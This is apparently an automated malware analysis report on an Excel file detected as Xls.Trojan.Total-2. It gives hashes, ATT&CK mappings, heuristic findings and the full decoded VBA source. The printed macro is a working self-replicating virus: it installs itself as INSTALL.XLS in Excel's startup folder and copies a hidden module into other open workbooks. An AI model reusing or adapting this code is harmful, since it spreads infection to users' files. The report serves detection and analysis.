Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f7b3c34c70e23cd0…

MALICIOUS

Office (OLE)

Size: 21.0 KB
Created: 1998-09-19 21:39:32
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: c4f3a3112f5bd28b3eb332abde2b026a
SHA-1: 6edfa1d9397d508d652db0f251bf39a6c58aa81c
SHA-256: f7b3c34c70e23cd0aa297fd32e5ba4beb73f1cdbfb81c1f212beb34a9aceb550
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel file containing VBA macros, including Auto_Open and Auto_Close functions, which are commonly used for malicious purposes. The script attempts to copy its VBA module to other workbooks and save itself as 'INSTALL.XLS' in the Excel startup path, indicating a persistence mechanism. The presence of Auto_Open and Auto_Close macros, along with the file's detection as 'Xls.Trojan.Total-2', strongly suggests malicious intent.

Heuristics 4

  • ClamAV: Xls.Trojan.Total-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Total-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2109 bytes
SHA-256: ff0527cfeb0c234ae8873b33a3a1020113f43265f483900c57134bcfe27dd943
Detection
ClamAV: Xls.Trojan.Total-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sum_total"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = ThisWorkbook.Name & "!sum_total.total"
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
'On Error Resume Next
PC_INITIAL_BOOK = Application.ThisWorkbook.Name
If Dir("C:\PASS.NHS") = "PASS.NHS" Then Exit Sub
pc_excel_startup_path = Application.StartupPath + "\INSTALL.XLS"
If Dir(pc_excel_startup_path) = "INSTALL.XLS" Then Exit Sub
'dstart:
'MsgBox "STARTING UP!"
ThisWorkbook.Modules("sum_total").Copy
new_book = ActiveWorkbook.Name
WindowState = xlMaximized
Application.Windows(new_book).Visible = False
'Application.Workbooks(new_book).SaveAs filename:=PC_EXCEL_STARTUP_PATH
Application.Workbooks(new_book).SaveAs filename:=pc_excel_startup_path
'MsgBox "All done saved as " & pc_excel_startup_path
'thisWorkbook.SaveAs filename:=PC_EXCEL_STARTUP_PATH
'ThisWorkbook.SaveAs filename:=PC_INITIAL_BOOK
End Sub
Sub total()
Attribute total.VB_ProcData.VB_Invoke_Func = " \n14"
PC_BOOK_COUNT = Application.Workbooks.Count
If PC_BOOK_COUNT = 1 Then Exit Sub
For pc_first_loop = 1 To PC_BOOK_COUNT
pc_copy_trigger = 0
PC_TARGET = Workbooks(pc_first_loop).Name
If PC_TARGET = ThisWorkbook.Name Then GoTo redundancy_check
pc_module_count = Workbooks(PC_TARGET).Modules.Count
If pc_module_count > 0 Then
For PC_SECOND_LOOP = 1 To pc_module_count
If Workbooks(PC_TARGET).Modules(PC_SECOND_LOOP).Name = "sum_total" Then pc_copy_trigger = 1
Next PC_SECOND_LOOP
End If
If pc_copy_trigger = 0 Then
Windows(PC_TARGET).Activate
ThisWorkbook.Modules("sum_total").Copy before:=Workbooks(PC_TARGET).Sheets(1)
Workbooks(PC_TARGET).Modules("sum_total").Visible = False
End If
redundancy_check:
Next pc_first_loop
skip:
Exit Sub
' ***********************************
' * IF YOU READ THIS THEN YOU WILL  *
' * REALISE THAT YOU HAVE THE MOST  *
' * RUBBISH ANTI-VIRUS SOFTWARE     *
' * BEWARE BECAUSE RELEASE II WILL  *
' * SCRAMBLE YOUR FAT - XOH         *
' ***********************************
End Sub